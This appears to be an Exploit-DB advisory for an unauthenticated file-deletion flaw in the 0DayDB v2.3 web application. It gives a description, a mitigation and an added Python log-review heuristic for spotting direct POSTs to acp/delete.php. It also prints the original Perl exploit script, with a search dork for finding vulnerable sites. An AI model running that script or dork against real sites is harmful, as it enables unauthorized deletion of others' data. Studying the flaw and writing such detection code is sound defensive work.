Vendor: 0DayDB v2.3
By: Pr0metheuS
CVSS: 7.5 (HIGH)
Remote Admin Bypass
CWE: 287
Product Name: 0DayDB v2.3
Affected Version From: v2.3
Affected Version To: v2.3
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

0DayDB v2.3 Remote Admin Bypass

This exploit allows an attacker to bypass the authentication of the 0DayDB v2.3 web application and gain access to the administrative panel. The attacker sends a POST request to the delete.php page with the ID of the file they want to delete, and the request is processed without authentication, so any file can be deleted.

Mitigation:

Ensure that all administrative functions are properly authenticated and that access to the administrative panel is restricted to authorized users.
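
Because this entry lists no patch, reviewing web server access logs for the request described above is a practical check. The following is an added example, not part of the original entry or of 0DayDB: a heuristic that flags POSTs to acp/delete.php arriving with no Referer or from a client that never loaded another admin page. It assumes Apache/nginx combined log format; the /0daydb/ install prefix, host name and log lines are constructed.

```python
import re

# Combined Log Format: ip ident user [time] "METHOD path PROTO" status size "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
TARGET = "/acp/delete.php"   # endpoint named in this entry
ADMIN_DIR = "/acp/"          # admin directory it lives in

# Constructed sample log lines (documentation addresses, hypothetical install path).
SAMPLE = [
    '198.51.100.7 - - [11/Jan/2008:10:00:01 +0000] "GET /0daydb/acp/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [11/Jan/2008:10:00:09 +0000] "POST /0daydb/acp/delete.php HTTP/1.1" 200 20 "http://example.test/0daydb/acp/index.php" "Mozilla/5.0"',
    '203.0.113.9 - - [11/Jan/2008:10:05:00 +0000] "POST /0daydb/acp/delete.php HTTP/1.1" 200 20 "-" "libwww-perl/5.808"',
    '203.0.113.9 - - [11/Jan/2008:10:05:02 +0000] "GET /0daydb/index.php HTTP/1.1" 200 900 "-" "libwww-perl/5.808"',
]


def find_direct_deletes(lines):
    """Flag POSTs to acp/delete.php that do not look like a form submitted
    from inside the admin panel. Heuristic: review hits, do not auto-block."""
    seen_admin = set()   # clients that already requested another /acp/ page
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue     # not combined format; skip rather than guess
        ip, path = m["ip"], m["path"].split("?", 1)[0]
        if m["method"] == "POST" and path.endswith(TARGET):
            reasons = []
            if ip not in seen_admin:
                reasons.append("no prior admin page view")
            if m["referer"] in ("", "-"):
                reasons.append("no referer")
            if reasons:
                findings.append({"ip": ip, "time": m["ts"], "status": m["status"],
                                 "agent": m["agent"], "reasons": reasons})
        elif ADMIN_DIR in path and not path.endswith(TARGET):
            seen_admin.add(ip)
    return findings


if __name__ == "__main__":
    for f in find_direct_deletes(SAMPLE):
        print(f["time"], f["ip"], f["status"], f["agent"], ", ".join(f["reasons"]))
```

A hit only shows that the request reached the endpoint; whether the deletion happened has to be confirmed against the application's data.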
Source

Exploit-DB raw data:

#!/usr/bin/perl
#Author : Pr0metheuS
#Script : 0DayDB v2.3
#Version : v2.3
#Dork : "Powered By 0DayDB v2.3"
#Gr33tz-Team.org
use LWP::UserAgent;
if(@ARGV!=3){
    print "*****************\n";
    print "0DayDB v2.3 Remote Admin Bypass\n";
    print "perl $0 <site> <path> <id>\n";
    print "downloads ID for delete\n";
    print "*****************\n";
    exit;   # stop after printing usage when arguments are missing
}
($site,$path,$id)=@ARGV;
sub pri {
	print "*****************\n";
	print "[+] Exploit completed\n";
	print "*****************";
}
sub con {
$ua = new LWP::UserAgent;
$ua->agent("Mozilla/8.0");
$ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(POST => "".$site."".$path."/acp/delete.php");
$req->content_type('application/x-www-form-urlencoded');
$req->content("id=".$id."");
$res = $ua->request($req);
if ($res->is_success) {
	pri();
}
}
con();

# milw0rm.com [2008-01-11]